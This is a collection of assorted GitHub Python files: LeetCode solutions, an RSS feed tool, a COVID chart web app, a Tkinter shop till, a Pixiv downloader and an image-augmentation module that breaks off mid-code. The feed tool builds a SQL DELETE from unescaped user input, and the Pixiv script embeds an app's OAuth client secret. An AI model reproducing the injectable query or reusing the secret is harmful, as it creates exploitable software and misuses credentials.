+{"seq_id":"789629888","text":"# Definition for singly-linked list.\nclass ListNode:\n def __init__(self, x):\n self.val = x\n self.next = None\n\nclass Solution1:\n def reverseList(self, head):\n \"\"\"\n :type head: ListNode\n :rtype: ListNode\n \"\"\"\n prev = None\n \n while head:\n cur = head\n head = head.next\n cur.next = prev\n prev = cur\n \n return prev\n\nclass Solution2:\n def reverseList(self, head):\n \"\"\"\n :type head: ListNode\n :rtype: ListNode\n \"\"\"\n return self.reverse(head, None)\n \n def reverse(self, head, prev):\n if not head:\n return prev\n \n next_node = head.next\n head.next = prev\n return self.reverse(next_node, head)","repo_name":"PhoebeDreamer/leetcode","sub_path":"src/lc206.py","file_name":"lc206.py","file_ext":"py","file_size_in_byte":798,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"}
+{"seq_id":"9058345568","text":"#!/usr/bin/env python\n\nimport os\nimport sys\nimport json\nimport sqlite3\nimport datetime\nimport scraperwiki\nimport feedparser\nimport argparse\n\n\ndef write_response(r=None, success=True, message=None):\n d = {\n \"results\": r,\n \"success\": \"ok\" if success else \"error\",\n \"message\": message or \"\"\n }\n json.dump(d, sys.stdout)\n sys.stdout.flush()\n\n\nclass Feed(object):\n\n @classmethod\n def retrieve(cls, name, url):\n try:\n d = feedparser.parse(url)\n\n # Check it is actually a feed\n except Exception as e:\n return None, str(e)\n\n name = name or d['feed'].get('title', 'subtitle')\n for e in d.entries:\n r = {\n \"feed\": name,\n \"source\": url,\n \"id\": e.id,\n \"title\": e.title,\n \"link\": e.link,\n \"published\": e.published,\n \"updated\": e.updated,\n \"summary\": e.summary,\n \"content\": e.content if hasattr(e, \"content\") else \"\",\n } \n scraperwiki.sqlite.save([\"id\",\"link\"], r, \"entries\")\n\n return name, None\n\nclass FeedManager(object):\n\n def status(self):\n \"\"\"\n Returns the current status of the feeds as a list of dicts where\n each dict contains:\n name, url, count of entries, last_fetch, last_error\n \"\"\"\n res = []\n rows = scraperwiki.sqlite.execute(\"select name,url from feeds\")\n for row in rows['data']:\n nm = row[0]\n url = row[1]\n cnt = scraperwiki.sqlite.execute(\"select count(*) from entries where feed=? and source=?\", [nm, url])\n cnt = int(cnt['data'][0][0])\n d = {\n \"name\": row[0],\n \"url\" : row[1],\n \"items\": cnt\n }\n res.append(d)\n\n write_response(res)\n\n\n def add(self, url):\n \"\"\"\n Adds a new feed when provided with a URL, if successful returns the\n status()\n \"\"\"\n name, err = Feed.retrieve(None, url)\n if err:\n write_response(success=False, message=err)\n return\n\n f = {\n \"name\": name,\n \"url\": url\n }\n scraperwiki.sqlite.save(['name', 'url'], f, \"feeds\")\n self.status()\n\n\n def remove(self, url):\n \"\"\"\n Removes an existing feed when provided with a URL, if successful returns the\n status()\n \"\"\" \n scraperwiki.sqlite.execute(\"delete from feeds where url='%s';\" % url)\n scraperwiki.sqlite.commit()\n self.status()\n\n def reset(self):\n \"\"\"\n Removes all data :(\n \"\"\"\n scraperwiki.sqlite.execute(\"delete from feeds\")\n scraperwiki.sqlite.execute(\"delete from entries\")\n self.status()\n\n def process(self):\n \"\"\"\n Iterates through all of the feeds and fetches the contents, before writing\n them to the database.\n \"\"\"\n feeds = scraperwiki.sqlite.execute(\"select name,url from feeds\")\n for nm,url in feeds['data']:\n Feed.retrieve(nm, url)\n\n self.status()\n\n\n# Make sure the database exists, setting up the entries and feeds table.\nscraperwiki.sql.dt.create_table({'id': '1'}, 'entries')\nscraperwiki.sql.dt.create_table({'name':'', 'url': ''}, 'feeds')\n\n# Read command line args to decide what we should be doing\nparser = argparse.ArgumentParser(description='Manage RSS feeds.')\nparser.add_argument('--status', action='store_true')\nparser.add_argument('--reset', action='store_true')\nparser.add_argument('--add', action='store')\nparser.add_argument('--remove', action='store')\nparser.add_argument('--process', action='store_true')\n\nfeeder = FeedManager()\n\nargs = parser.parse_args()\nif args.status:\n feeder.status()\nelif args.add:\n feeder.add(args.add)\nelif args.remove:\n feeder.remove(args.remove)\nelif args.reset:\n feeder.reset()\nelif args.process:\n feeder.process()\n","repo_name":"rossjones/feed-tool","sub_path":"fetch.py","file_name":"fetch.py","file_ext":"py","file_size_in_byte":4004,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"29611761408","text":"from bottle import Bottle, run, template, static_file\nimport csv\nimport os\nimport sys\nimport time\nimport logging\n\nlogger = logging.getLogger(__name__)\nlogger.setLevel(logging.DEBUG)\n\nformatter = logging.Formatter('%(name)s:%(levelname)s:%(message)s') # we use different formats for the file and for the console \nformatter_stream = logging.Formatter('%(asctime)s:%(name)s:%(levelname)s:%(message)s')\n\nfile_handler = logging.FileHandler('sample.log')\nfile_handler.setLevel(logging.ERROR)\nfile_handler.setFormatter(formatter)\n\nstream_handler = logging.StreamHandler()\nstream_handler.setFormatter(formatter_stream)\n\nlogger.addHandler(file_handler)\nlogger.addHandler(stream_handler)\n\n\n#fichier=os.environ['DATACOVID']\n# datafile for container\n# add comment to test ci workflow\n#fichier = '/opt/app/COVID-19/csse_covid_19_data/csse_covid_19_time_series/time_series_covid19_deaths_global.csv'\n\nfichier = 
'/opt/app/time_series_covid19_deaths_global.csv'\nfichier2 = '/opt/app/time_series_covid19_confirmed_global.csv'\nvaccineFile = '/opt/app/time_series_covid19_vaccine_global.csv'\n\n\n# datafile for local testing (home desktop)\n#fichier=\"/Users/matthias/python/data/COVID19/COVID-19/csse_covid_19_data/csse_covid_19_time_series/time_series_covid19_deaths_global.csv\"\n\n# datafile for local testing (home work desktop)\n#fichier=\"/Users/20011409/python/html-graph/COVID-19/csse_covid_19_data/csse_covid_19_time_series/time_series_covid19_deaths_global.csv\"\n\n# get the data files\n#path = \".\"\nlogger.debug(\"Define files from John Hopkins University in Github\")\nwget_file1=\"wget -q https://raw.githubusercontent.com/CSSEGISandData/COVID-19/master/csse_covid_19_data/csse_covid_19_time_series/time_series_covid19_deaths_global.csv\"\nwget_file2=\"wget -q https://raw.githubusercontent.com/CSSEGISandData/COVID-19/master/csse_covid_19_data/csse_covid_19_time_series/time_series_covid19_confirmed_global.csv\"\nwget_vaccine=\"wget -q https://raw.githubusercontent.com/govex/COVID-19/master/data_tables/vaccine_data/global_data/time_series_covid19_vaccine_global.csv\"\n\n#os.chdir(path) # Specifying the path where the cloned project needs to be copied\n\nprint(\"cloning Github data\" )\nlogger.debug(\"Start Cloning Github Data\")\nos.system(wget_file1) # Cloning\nos.system(wget_file2)\nos.system(wget_vaccine)\nlogger.debug(\"End Cloning Github Data\")\nprint(\"end cloning\")\n\n#Get update time\nlogger.debug(\"define consts\")\nnow = time.localtime(time.time())\nupdate_time = time.strftime(\"%y/%m/%d %H:%M\", now)\npopulation_us = 329256465\npopulation_fr = 67848156\npopulation_it = 60359546\npopulation_sp = 46934632\npopulation_uk = 65761117\ndebut = 50\nlabels=list()\n\ndef derivee(raw_data):\n\tvalue=0\n\tprog=[]\n\tfor i, v in enumerate(raw_data[:-1]):\n\t\ttry:\n\t\t\tvalue=int(raw_data[i+1])-int(raw_data[i])\n\t\texcept ValueError:\n\t\t\tprint(\"[ERROR] in derivee function : could not convert data into an integer.\")\n\t\tif value > 0:\n\t\t\tprog.append(value)\n\t\telse:\n\t\t\tprog.append(0)\n\treturn prog\n\ndef moyenne(raw_data, population):\n#this function scales the figures to the population (per 1,000,000 inhabitants)\n\tmoy=[]\n\tmoy=[i*1000000/population for i in raw_data]\n\t# removal of outliers\n\t#for c,i in enumerate(moy):\n\t\t#if i > 0.20:\n\t\t\t#moy[c]=0\n\treturn moy\n\ndef lissage(raw_data):\n#this function smooths a curve using a trailing moving average over the last 7 data points\n\tlissee=[]\n\tvalue=0\n\tfor i in range(7, len(raw_data)):\n\t\ttry:\n\t\t\tvalue=((raw_data[i-1]+raw_data[i-2]+raw_data[i-3]+raw_data[i-4]+raw_data[i-5]+raw_data[i-6]+raw_data[i-7])/7)\n\t\texcept ValueError:\n\t\t\tprint(\"[ERROR] in lissage function : could not convert data into a number.\")\n\t\tif value > 0:\n\t\t\tlissee.append(value)\n\t\telse:\n\t\t\tlissee.append(0)\n\treturn lissee\n\n#print (\"3 - reading files\")\n#death file \nwith open(fichier, 'r') as f:\n\ttab_reader = csv.reader(f, delimiter=',')\n\tfor row in tab_reader:\n\t\tprovince = row[0]\n\t\tstate = row[1]\n\t\tif province == 'Province/State':\n\t\t\tlongueur=len(row)\n\t\t\tlabels=row[debut:longueur]\n\t\t\tprint(\"Number of values for deaths:\"+ str(longueur))\n\t\t\t#days=row[4:longueur]\n\t\tif province == '':\n\t\t\tif state == 
'France':\n\t\t\t\t#print(row)\n\t\t\t\tlongueur=len(row)\n\t\t\t\tfrance=row[debut:longueur]\n\t\t\tif state == 'Italy':\n\t\t\t\tlongueur=len(row)\n\t\t\t\titaly=row[debut:longueur]\n\t\t\tif state == 'Spain':\n\t\t\t\tlongueur=len(row)\n\t\t\t\tspain=row[debut:longueur]\n\t\t\tif state == 'United Kingdom':\n\t\t\t\tlongueur=len(row)\n\t\t\t\tuk=row[debut:longueur]\n\t\t\tif state == 'US':\n\t\t\t\tlongueur=len(row)\n\t\t\t\tus=row[debut:longueur]\n\n#confirmed file\nwith open(fichier2, 'r') as f:\n\ttab_reader = csv.reader(f, delimiter=',')\n\tfor row in tab_reader:\n\t\tprovince = row[0]\n\t\tstate = row[1]\n\t\tif province == 'Province/State':\n\t\t\tlongueur=len(row)\n\t\t\tlabels=row[debut:longueur]\n\t\t\t#print(\"Number of values for confirmed cases:\"+ str(longueur))\n\t\t\t#days=row[4:longueur]\n\t\tif province == '':\n\t\t\tif state == 'France':\n\t\t\t\t#print(row)\n\t\t\t\tlongueur=len(row)\n\t\t\t\tconfirmed_france=row[debut:longueur]\n\t\t\tif state == 'Italy':\n\t\t\t\tlongueur=len(row)\n\t\t\t\tconfirmed_italy=row[debut:longueur]\n\t\t\tif state == 'Spain':\n\t\t\t\tlongueur=len(row)\n\t\t\t\tconfirmed_spain=row[debut:longueur]\n\t\t\tif state == 'United Kingdom':\n\t\t\t\tlongueur=len(row)\n\t\t\t\tconfirmed_uk=row[debut:longueur]\n\t\t\tif state == 'US':\n\t\t\t\tlongueur=len(row)\n\t\t\t\tconfirmed_us=row[debut:longueur]\n\n\n#vaccine file\n\n#calculations\n# the progression is the derivative of the raw data ...\n#print (\"calculations\")\nprogression_france = derivee(france)\nprogression_italy=derivee(italy)\nprogression_spain=derivee(spain)\nprogression_uk=derivee(uk)\nprogression_us=derivee(us)\n\nconfirmed_progression_france = derivee(confirmed_france)\nconfirmed_progression_italy=derivee(confirmed_italy)\nconfirmed_progression_spain=derivee(confirmed_spain)\nconfirmed_progression_uk=derivee(confirmed_uk)\nconfirmed_progression_us=derivee(confirmed_us)\n\n#calculation of the mean per 1,000,000 inhabitants\nmean_fr=moyenne(progression_france, population_fr)\nmean_it=moyenne(progression_italy, population_it)\nmean_sp=moyenne(progression_spain,population_sp)\nmean_uk=moyenne(progression_uk,population_uk)\nmean_us=moyenne(progression_us, population_us)\n\nconfirmed_mean_fr=moyenne(confirmed_progression_france, population_fr)\nconfirmed_mean_it=moyenne(confirmed_progression_italy, population_it)\nconfirmed_mean_sp=moyenne(confirmed_progression_spain,population_sp)\nconfirmed_mean_uk=moyenne(confirmed_progression_uk,population_uk)\nconfirmed_mean_us=moyenne(confirmed_progression_us, population_us)\n\n#\n\n#app and app.route here\n\n#\n#print(\"before run(app ..)\")\napp = Bottle()\n\n@app.route('/static/<filepath:path>')\n\ndef server_static(filepath):\n return static_file(filepath, root='static/')\n\n@app.route('/')\n\ndef index():\n\t#assert len(labels)==len(progression_france), \"Error : number of dates is different from number of values!\"\n return 
template('index.tpl',\n\t\t\t\t\tupdate_time=update_time,\n\t\t\t\t\tlabel=labels,\n\t\t\t\t\tmonth_label=labels[-60:],\n\t\t\t\t\tprogression_fr=lissage(progression_france),\n\t\t\t\t\tconfirmed_data_fr=lissage(confirmed_progression_france),\n\t\t\t\t\tprogression_us=lissage(progression_us),\n\t\t\t\t\tconfirmed_data_us=lissage(confirmed_progression_us),\n\t\t\t\t\tprogression_uk=lissage(progression_uk),\n\t\t\t\t\tconfirmed_data_uk=lissage(confirmed_progression_uk),\n\t\t\t\t\tdata_fr=lissage(mean_fr),\n\t\t\t\t\tdata_us=lissage(mean_us),\n\t\t\t\t\tdata_uk=lissage(mean_uk),\n\t\t\t\t\tdata_it=lissage(mean_it),\n\t\t\t\t\tdata_sp=lissage(mean_sp),\n\t\t\t\t\tdata_month_fr=lissage(mean_fr[-60:]),\n\t\t\t\t\tdata_month_us=lissage(mean_us[-60:]),\n\t\t\t\t\tdata_month_uk=lissage(mean_uk[-60:]),\n\t\t\t\t\tdata_month_it=lissage(mean_it[-60:]),\n\t\t\t\t\tdata_month_sp=lissage(mean_sp[-60:]),\n\t\t\t\t\tlast_update=labels[-1],\n\t\t\t\t\tlast_value_fr=progression_france[-1],\n\t\t\t\t last_value_us=progression_us[-1],\n\t\t\t\t\tlast_value_uk=progression_uk[-1],\n\t\t\t\t\tlast_value_sp=progression_spain[-1],\n\t\t\t\t\tlast_value_it=progression_italy[-1],\n\t\t\t\t\tlast_value_confirmed_fr=confirmed_progression_france[-1],\n\t\t\t\t\tlast_value_confirmed_us=confirmed_progression_us[-1],\n\t\t\t\t\tlast_value_confirmed_uk=confirmed_progression_uk[-1],\n\t\t\t\t\tlast_value_confirmed_sp=confirmed_progression_spain[-1],\n\t\t\t\t\tlast_value_confirmed_it=confirmed_progression_italy[-1],\n\t\t\t\t\t)\n\nrun(app, host='0.0.0.0', debug=True, reloader=False, port=8080)\n","repo_name":"matthiasdupont/covid-graph","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":8237,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"2852389225","text":"import streamlit as st\nfrom streamlit import runtime\nfrom streamlit_ace import st_ace\nfrom utils.code_runner import execute\nfrom utils.shorten_urls import get_code_params, set_code_params\n\nst.set_page_config(\n page_title=\"Stlite - Playground\",\n layout=\"wide\",\n initial_sidebar_state=\"expanded\",\n)\nst.title(\"Playground\")\n\nif \"python\" not in st.session_state:\n get_code_params()\n\nwith st.expander(\"Code\", expanded=True):\n content = st_ace(\n value=st.session_state[\"python\"],\n key=\"python\",\n language=\"python\",\n min_lines=20,\n )\n\nawait execute(st.session_state[\"python\"])\nset_code_params()\n","repo_name":"dmenezesgabriel/lite","sub_path":"stlite/streamlit_app.py","file_name":"streamlit_app.py","file_ext":"py","file_size_in_byte":633,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"17628750127","text":"from typing import List\n\nclass Solution:\n def rotate(self, nums: List[int], k: int) -> None:\n if len(nums) <= 1:\n return\n \n k = k%len(nums)\n def reverseList(left, right):\n while lefttarget:\n win_product/=arr[left]\n left+=1\n for i in range(left,right,1):\n tmp=arr[i:right+1]\n res.append(tmp)\n return res\n\n\n ","repo_name":"HumphreyHao/Pattern-for-python","sub_path":"28_1.py","file_name":"28_1.py","file_ext":"py","file_size_in_byte":623,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"24220129759","text":"from tkinter import*\nimport random\nimport time\nimport datetime\nimport tkinter.messagebox\n\ndef Ref():\n x = random.randint(1234, 434354)\n randomRef = str(x)\n rand.set(randomRef)\n\n CoG = 
float(galaxy.get())\n CoK = float(kinder.get())\n CoB = float(bounty.get())\n CoT = float(twix.get())\n\n Cost_Galaxy = CoG * 1.99\n Cost_Kinder = CoK * 1.49\n Cost_Bounty = CoB * 1.29\n Cost_Twix = CoT * 0.99\n\n cost_subtotal = \"£\" + str('%.2f' % (Cost_Bounty + Cost_Galaxy + Cost_Kinder + Cost_Twix))\n cost_tax = \"£\" + str('%.2f' % ((Cost_Bounty + Cost_Galaxy + Cost_Kinder + Cost_Twix) * 0.2))\n cost_total = \"£\" + str('%.2f' % ((Cost_Bounty + Cost_Galaxy + Cost_Kinder + Cost_Twix) * 1.2))\n \n subtotal.set(cost_subtotal)\n vat.set(cost_tax)\n total.set(cost_total)\n\ndef Quit():\n root.destroy()\n\ndef Reset():\n rand.set(\"\")\n galaxy.set(\"\")\n kinder.set(\"\")\n bounty.set(\"\")\n twix.set(\"\")\n total.set(\"\")\n subtotal.set(\"\")\n vat.set(\"\")\n\nroot = Tk()\nroot.geometry(\"1600x800+0+0\")\nroot.title(\"Sea Front Sweet & Candy Shop System\")\n\nTops = Frame(root, width = 1600, height = 50, relief=SUNKEN)\nTops.pack(side=TOP)\n\nFrame_1 = Frame(root, width = 800, height = 700, relief=SUNKEN)\nFrame_1.pack(side=LEFT)\n\nFrame_2 = Frame(root, width = 800, height = 700, relief=SUNKEN)\nFrame_2.pack(side=RIGHT)\n\n#---------------------------Time---------------------------\n\nnow = datetime.datetime.now()\nlocaltime = time.asctime(time.localtime(time.time()))\n\n#---------------------------Info---------------------------\n\nlblInfo = Label(Tops, font = ('arial', 50, 'bold'), text = 'Sea Front Sweet & Candy Shop System', fg = 'navy', bd = 10, anchor = 'w')\nlblInfo.grid(row = 0, column = 0)\nlblInfo = Label(Tops, font = ('arial', 20, 'bold'), text = localtime, fg = 'navy', bd = 10, anchor = 'w')\nlblInfo.grid(row = 1, column = 0)\n\n#---------------------------Sweets---------------------------\n\nrand = StringVar()\ngalaxy = StringVar()\nkinder = StringVar()\nbounty = StringVar()\ntwix = StringVar()\ntotal = StringVar()\nsubtotal = StringVar()\nvat = StringVar()\n\nlblReference = Label(Frame_1, font = ('arial', 16, 'bold'), text = 'Reference', bd = 10, anchor = 'w')\nlblReference.grid(row = 0, column = 0)\ntxtReference = Entry(Frame_1, font = ('arial', 16, 'bold'), textvariable = rand, bd = 10, bg = 'light blue', justify = 'right')\ntxtReference.grid(row = 0, column = 1)\n\nlblGalaxy = Label(Frame_1, font = ('arial', 16, 'bold'), text = 'Galaxy', bd = 10, anchor = 'w')\nlblGalaxy.grid(row = 1, column = 0)\ntxtGalaxy = Entry(Frame_1, font = ('arial', 16, 'bold'), textvariable = galaxy, bd = 10, bg = 'light blue', justify = 'right')\ntxtGalaxy.grid(row = 1, column = 1)\n\nlblKinder = Label(Frame_1, font = ('arial', 16, 'bold'), text = 'Kinder', bd = 10, anchor = 'w')\nlblKinder.grid(row = 2, column = 0)\ntxtKinder = Entry(Frame_1, font = ('arial', 16, 'bold'), textvariable = kinder, bd = 10, bg = 'light blue', justify = 'right')\ntxtKinder.grid(row = 2, column = 1)\n\nlblBounty = Label(Frame_1, font = ('arial', 16, 'bold'), text = 'Bounty', bd = 10, anchor = 'w')\nlblBounty.grid(row = 4, column = 0)\ntxtBounty = Entry(Frame_1, font = ('arial', 16, 'bold'), textvariable = bounty, bd = 10, bg = 'light blue', justify = 'right')\ntxtBounty.grid(row = 4, column = 1)\n\nlblTwix = Label(Frame_1, font = ('arial', 16, 'bold'), text = 'Twix', bd = 10, anchor = 'w')\nlblTwix.grid(row = 5, column = 0)\ntxtTwix = Entry(Frame_1, font = ('arial', 16, 'bold'), textvariable = twix, bd = 10, bg = 'light blue', justify = 'right')\ntxtTwix.grid(row = 5, column = 1)\n\n#--------------------Pricing------------------\n\nlblSubtotal = Label(Frame_1, font = ('arial', 16, 'bold'), text = 'Subtotal', bd = 
10, anchor = 'w')\nlblSubtotal.grid(row = 1, column = 2)\ntxtSubtotal = Entry(Frame_1, font = ('arial', 16, 'bold'), textvariable = subtotal, bd = 10, bg = '#ffffff', justify = 'right')\ntxtSubtotal.grid(row = 1, column = 3)\n\nlblVat = Label(Frame_1, font = ('arial', 16, 'bold'), text = 'VAT', bd = 10, anchor = 'w')\nlblVat.grid(row = 2, column = 2)\ntxtVat = Entry(Frame_1, font = ('arial', 16, 'bold'), textvariable = vat, bd = 10, bg = '#ffffff', justify = 'right')\ntxtVat.grid(row = 2, column = 3)\n\nlblTotal = Label(Frame_1, font = ('arial', 16, 'bold'), text = 'Total', bd = 10, anchor = 'w')\nlblTotal.grid(row = 4, column = 2)\ntxtTotal = Entry(Frame_1, font = ('arial', 16, 'bold'), textvariable = total, bd = 10, bg = '#ffffff', justify = 'right')\ntxtTotal.grid(row = 4, column = 3)\n\n#-------------------Buttons------------------\n\n\nbtnTotal = Button(Frame_1, padx = 16, pady = 8, bd = 10, fg = 'black', font = ('arial', 16, 'bold'), text = 'Total', \nbg = 'light blue', command = Ref).grid(row = 8, column = 1)\n\nbtnReceipt = Button(Frame_1, padx = 16, pady = 8, bd = 10, fg = 'black', font = ('arial', 16, 'bold'), text = 'Receipt', \nbg = 'light blue').grid(row = 8, column = 2)\n\nbtnReset = Button(Frame_1, padx = 16, pady = 8, bd = 10, fg = 'black', font = ('arial', 16, 'bold'), text = 'Reset', \nbg = 'light blue', command = Reset).grid(row = 8, column = 3)\n\nbtnQuit = Button(Frame_1, padx = 16, pady = 8, bd = 10, fg = 'black', font = ('arial', 16, 'bold'), text = 'Quit', \nbg = 'light blue', command = Quit).grid(row = 8, column = 4)\n\n#------------------------Receipt--------------------\n\ntxtReceipt_print = Text(Frame_2, bd = 7, bg = 'light blue', width = 50, font = ('arial', 16, 'bold'))\ntxtReceipt_print.place(width=1000, height=420)\n\n\n\n\n\nroot.mainloop()\n","repo_name":"mo-abu/sweet-manager","sub_path":"sweetshop log in system.py","file_name":"sweetshop log in system.py","file_ext":"py","file_size_in_byte":5465,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"27449961650","text":"import setuptools\nimport os\nimport os.path\n\n\ndef SubDirecs(direc, pre):\n list = []\n for sub in os.listdir(direc):\n if sub == \"__pycache__\":\n continue\n path = os.path.join(direc, sub)\n if not os.path.isdir(path):\n continue\n list.append(pre + sub)\n return list\n\n\nwith open(\"README.md\", \"r\") as fh:\n long_description = fh.read()\n\npackages = [\"cornichon\"]\nroot = os.path.dirname(__file__)\npackages.extend(SubDirecs(os.path.join(root, \"cornichon\"), \"cornichon/\"))\n\nsetuptools.setup(\n name=\"cornichon\",\n version=\"0.9.5\",\n author=\"Zeb Mason\",\n author_email=\"consulting@cyclerouter.co.uk\",\n maintainer=\"Zeb Mason\",\n maintainer_email=\"consulting@cyclerouter.co.uk\",\n license=\"LGPL v2\",\n description=\"A small Gherkin DSL parser that generates stub code\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n url=\"https://github.com/zebmason/Cornichon\",\n packages=packages,\n classifiers=[\n \"Framework :: Pytest\",\n \"Topic :: Software Development :: Code Generators\",\n \"Topic :: Software Development :: Testing :: BDD\",\n \"Topic :: Text Processing\",\n \"Development Status :: 4 - Beta\",\n \"License :: OSI Approved :: GNU Lesser General Public License v2 (LGPLv2)\",\n \"Programming Language :: C#\",\n \"Programming Language :: C++\",\n \"Programming Language :: Python\",\n \"Programming Language :: Python :: 3\",\n \"Programming Language :: Visual 
Basic\",\n \"Operating System :: OS Independent\",\n \"Intended Audience :: Developers\",\n ],\n python_requires='>=3.0.0',\n)\n","repo_name":"zebmason/Cornichon","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1666,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"72"} +{"seq_id":"73888244071","text":"# -*- coding: utf8 -*-\nimport getpass\nimport requests\nimport sys\n\n_session = None\n_headers = {}\n\ndef initialization():\n global _session\n _session = requests.Session()\n\n global _headers\n _headers = {\n 'Referer': 'http://www.pixiv.net/',\n 'User-Agent': 'PixivIOSApp/5.7.2',\n 'Content-Type': 'application/x-www-form-urlencoded'\n }\n\ndef login():\n url = 'https://oauth.secure.pixiv.net/auth/token'\n\n postdata = {\n 'username': input('Pixiv ID: '),\n 'password': getpass.getpass('Password: '),\n 'grant_type': 'password',\n 'client_id': 'bYGKuGVw91e0NMfPGp44euvGt59s',\n 'client_secret': 'HP3RmkgAmEGro0gn1x9ioawQE8WMfvLXDz3ZqxpK',\n }\n r = _request(method = 'POST', url = url, postdata = postdata)\n\n _headers.update({\n 'Authorization': 'Bearer ' + r.json()['response']['access_token'],\n 'Cookie': 'PHPSESSID=' + r.cookies['PHPSESSID']\n })\n\ndef getRank(data):\n url = 'https://public-api.secure.pixiv.net/v1/ranking/all'\n params = {\n 'mode': data['mode'],\n 'page': data['p'],\n 'date' : data['date'],\n 'per_page': 50,\n 'include_stats': False,\n 'include_sanity_level': False,\n 'image_sizes': 'large',\n 'profile_image_sizes': 'px_50x50'\n }\n r = _request(method = 'GET', url = url, params = params)\n\n return r.json()\n\ndef downloadImage(data):\n with open(data['path'], 'wb') as f:\n r = _request(method = 'GET', url = data['url'], stream = True)\n\n currentLength = 0\n totalLength = int(r.headers.get('content-length'))\n\n print('\\033[?25l', end = '')\n for chunk in r.iter_content(chunk_size = int(totalLength / 20)):\n f.write(chunk)\n currentLength += len(chunk)\n _processingBar(int(20 * currentLength / totalLength), data['str'])\n print('\\033[?25h', end = '')\n\n if r.status_code == requests.codes.ok:\n print('\\033[32mdone\\033[0m')\n else:\n print('\\033[31mfail\\033[0m')\n\ndef _processingBar(process, message):\n sys.stdout.write('\\r%s: %3s%% %s%s ' % (message, str(process * 5), '\\033[47m' + ' ' * process + '\\033[0m', ' ' * (20 - process)))\n sys.stdout.flush()\n\ndef _request(method, url, postdata = None, params = None, stream = False):\n if method == 'GET':\n return _session.get(url, headers = _headers, params = params, stream = stream, timeout = 10)\n else:\n return _session.post(url, headers = _headers, params = params, data = postdata, timeout = 10)\n","repo_name":"YukiSora/pixiv-downloader","sub_path":"webIO.py","file_name":"webIO.py","file_ext":"py","file_size_in_byte":2544,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"19785863905","text":"import os\nfrom PIL import Image\nimport cv2\nimport os.path\nimport time\nimport torch\nimport torchvision.datasets as dset\nimport torchvision.transforms as transforms\nimport torch.utils.data as data\nimport numpy as np\n\nimport skimage as sk\nfrom skimage.filters import gaussian\nfrom io import BytesIO\nfrom wand.image import Image as WandImage\nfrom wand.api import library as wandlibrary\nimport wand.color as WandColor\nimport ctypes\nfrom PIL import Image as PILImage\nimport cv2\nfrom scipy.ndimage import zoom as scizoom\nfrom scipy.ndimage.interpolation import 
map_coordinates\nimport warnings\n\n## Adapted from https://github.com/hendrycks/robustness\n# For more info read https://arxiv.org/abs/1903.12261\n\nIMG_EXTENSIONS = ['.jpg', '.jpeg', '.png', '.ppm', '.bmp', '.pgm']\nwarnings.simplefilter(\"ignore\", UserWarning)\n\n# Tell Python about the C method\nwandlibrary.MagickMotionBlurImage.argtypes = (ctypes.c_void_p, # wand\n ctypes.c_double, # radius\n ctypes.c_double, # sigma\n ctypes.c_double) # angle\n\n# Extend wand.image.Image class to include method signature\nclass MotionImage(WandImage):\n def motion_blur(self, radius=0.0, sigma=0.0, angle=0.0):\n wandlibrary.MagickMotionBlurImage(self.wand, radius, sigma, angle)\n\n\nclass FileHelpers:\n def is_image_file(filename):\n \"\"\"Checks if a file is an image.\n Args:\n filename (string): path to a file\n Returns:\n bool: True if the filename ends with a known image extension\n \"\"\"\n filename_lower = filename.lower()\n return any(filename_lower.endswith(ext) for ext in IMG_EXTENSIONS)\n\n def find_subfolders(dir):\n subfolders = [d for d in os.listdir(dir) if os.path.isdir(os.path.join(dir, d))]\n subfolders.sort()\n subfolder_to_idx = {subfolders[i]: i for i in range(len(subfolders))}\n return subfolders, subfolder_to_idx\n\n\n def make_dataset(dir, subfolder_to_idx):\n images = []\n dir = os.path.expanduser(dir)\n if subfolder_to_idx:\n for target in sorted(os.listdir(dir)):\n d = os.path.join(dir, target)\n if not os.path.isdir(d):\n continue\n\n for root, _, fnames in sorted(os.walk(d)):\n for fname in sorted(fnames):\n if FileHelpers.is_image_file(fname):\n path = os.path.join(root, fname)\n item = (path, fname, subfolder_to_idx[target])\n images.append(item)\n else:\n for root, _, fnames in sorted(os.walk(dir)):\n for fname in sorted(fnames):\n if FileHelpers.is_image_file(fname):\n path = os.path.join(root, fname)\n item = (path, fname,\"\")\n images.append(item)\n\n\n return images\n\nclass AugmentationHelpers:\n # -------------- Helpers ------------------\n\n def disk(radius, alias_blur=0.1, dtype=np.float32):\n if radius <= 8:\n L = np.arange(-8, 8 + 1)\n ksize = (3, 3)\n else:\n L = np.arange(-radius, radius + 1)\n ksize = (5, 5)\n X, Y = np.meshgrid(L, L)\n aliased_disk = np.array((X ** 2 + Y ** 2) <= radius ** 2, dtype=dtype)\n aliased_disk /= np.sum(aliased_disk)\n\n # supersample disk to antialias\n return cv2.GaussianBlur(aliased_disk, ksize=ksize, sigmaX=alias_blur)\n\n # Extend wand.image.Image class to include method signature\n class MotionImage(WandImage):\n def motion_blur(self, radius=0.0, sigma=0.0, angle=0.0):\n wandlibrary.MagickMotionBlurImage(self.wand, radius, sigma, angle)\n\n # modification of https://github.com/FLHerne/mapgen/blob/master/diamondsquare.py\n def plasma_fractal(mapsize=256, wibbledecay=3):\n \"\"\"\n Generate a heightmap using diamond-square algorithm.\n Return square 2d array, side length 'mapsize', of floats in range 0-255.\n 'mapsize' must be a power of two.\n \"\"\"\n assert (mapsize & (mapsize - 1) == 0)\n maparray = np.empty((mapsize, mapsize), dtype=np.float_)\n maparray[0, 0] = 0\n stepsize = mapsize\n wibble = 100\n\n def wibbledmean(array):\n return array / 4 + wibble * np.random.uniform(-wibble, wibble, array.shape)\n\n def fillsquares():\n \"\"\"For each square of points stepsize apart,\n calculate middle value as mean of points + wibble\"\"\"\n cornerref = maparray[0:mapsize:stepsize, 0:mapsize:stepsize]\n squareaccum = cornerref + np.roll(cornerref, shift=-1, axis=0)\n squareaccum += 